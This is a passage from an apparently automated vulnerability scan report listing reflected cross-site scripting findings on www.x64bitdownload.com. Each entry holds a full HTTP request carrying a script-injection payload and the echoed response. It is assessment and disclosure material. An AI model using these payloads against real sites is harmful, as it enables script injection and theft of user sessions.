Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-troll-downloads.html?b2d4c"><script>alert(1)</script>b3d1287dd66=1" />
...[SNIP]...

4.1611. http://www.x64bitdownload.com/64-bit-use-next-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5baa0"><script>alert(1)</script>4b3b5d06ac5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-use-next-downloads.html5baa0"><script>alert(1)</script>4b3b5d06ac5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-use-next-downloads.html5baa0"><script>alert(1)</script>4b3b5d06ac5" />
...[SNIP]...

4.1612. http://www.x64bitdownload.com/64-bit-use-next-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-use-next-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f665d"><script>alert(1)</script>b0fbaf8a5f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-use-next-downloads.html?f665d"><script>alert(1)</script>b0fbaf8a5f3=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-use-next-downloads.html?f665d"><script>alert(1)</script>b0fbaf8a5f3=1" />
...[SNIP]...

4.1613. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7902c"><script>alert(1)</script>6aa1bdd3d27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html7902c"><script>alert(1)</script>6aa1bdd3d27 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-c-44-newsgroup-clients-downloads.html7902c"><script>alert(1)</script>6aa1bdd3d27" />
...[SNIP]...

4.1614. http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2042"><script>alert(1)</script>dcfd4e32e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html?d2042"><script>alert(1)</script>dcfd4e32e26=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-c-44-newsgroup-clients-downloads.html?d2042"><script>alert(1)</script>dcfd4e32e26=1" />
...[SNIP]...

4.1615. http://www.x64bitdownload.com/64-bit-usenet-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c53"><script>alert(1)</script>61783017a7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-downloads.htmlb9c53"><script>alert(1)</script>61783017a7a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-downloads.htmlb9c53"><script>alert(1)</script>61783017a7a" />
...[SNIP]...

4.1616. http://www.x64bitdownload.com/64-bit-usenet-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7053"><script>alert(1)</script>b56ce311832 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-downloads.html?c7053"><script>alert(1)</script>b56ce311832=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:33 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22usenet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-downloads.html?c7053"><script>alert(1)</script>b56ce311832=1" />
...[SNIP]...

4.1617. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88aaf"><script>alert(1)</script>189e1a3160f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-search-engine-downloads.html88aaf"><script>alert(1)</script>189e1a3160f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-search-engine-downloads.html88aaf"><script>alert(1)</script>189e1a3160f" />
...[SNIP]...

4.1618. http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenet-search-engine-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6caf6"><script>alert(1)</script>8b75e1c033 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenet-search-engine-downloads.html?6caf6"><script>alert(1)</script>8b75e1c033=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22usenet-search-engine%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22usenet+search+engine%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenet-search-engine-downloads.html?6caf6"><script>alert(1)</script>8b75e1c033=1" />
...[SNIP]...

4.1619. http://www.x64bitdownload.com/64-bit-usenext-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a316"><script>alert(1)</script>d8cd7fa8591 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenext-downloads.html9a316"><script>alert(1)</script>d8cd7fa8591 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenext-downloads.html9a316"><script>alert(1)</script>d8cd7fa8591" />
...[SNIP]...

4.1620. http://www.x64bitdownload.com/64-bit-usenext-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-usenext-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 987b5"><script>alert(1)</script>7e91aeed80a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-usenext-downloads.html?987b5"><script>alert(1)</script>7e91aeed80a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22usenext%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-usenext-downloads.html?987b5"><script>alert(1)</script>7e91aeed80a=1" />
...[SNIP]...

4.1621. http://www.x64bitdownload.com/64-bit-video-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb00e"><script>alert(1)</script>e2b8c71a364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-video-downloads.htmlcb00e"><script>alert(1)</script>e2b8c71a364 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-video-downloads.htmlcb00e"><script>alert(1)</script>e2b8c71a364" />
...[SNIP]...

4.1622. http://www.x64bitdownload.com/64-bit-video-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-video-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52103"><script>alert(1)</script>c4132b9c2b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-video-downloads.html?52103"><script>alert(1)</script>c4132b9c2b9=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22video%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-video-downloads.html?52103"><script>alert(1)</script>c4132b9c2b9=1" />
...[SNIP]...

4.1623. http://www.x64bitdownload.com/64-bit-xpat-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5865a"><script>alert(1)</script>73566294139 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-xpat-downloads.html5865a"><script>alert(1)</script>73566294139 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-xpat-downloads.html5865a"><script>alert(1)</script>73566294139" />
...[SNIP]...

4.1624. http://www.x64bitdownload.com/64-bit-xpat-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-xpat-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc61"><script>alert(1)</script>c4ecea0b493 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-xpat-downloads.html?6fc61"><script>alert(1)</script>c4ecea0b493=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:52 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22xpat%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-xpat-downloads.html?6fc61"><script>alert(1)</script>c4ecea0b493=1" />
...[SNIP]...

4.1625. http://www.x64bitdownload.com/64-bit-yenc-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-yenc-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b47d8"><script>alert(1)</script>80eaf09c798 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-yenc-downloads.htmlb47d8"><script>alert(1)</script>80eaf09c798 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

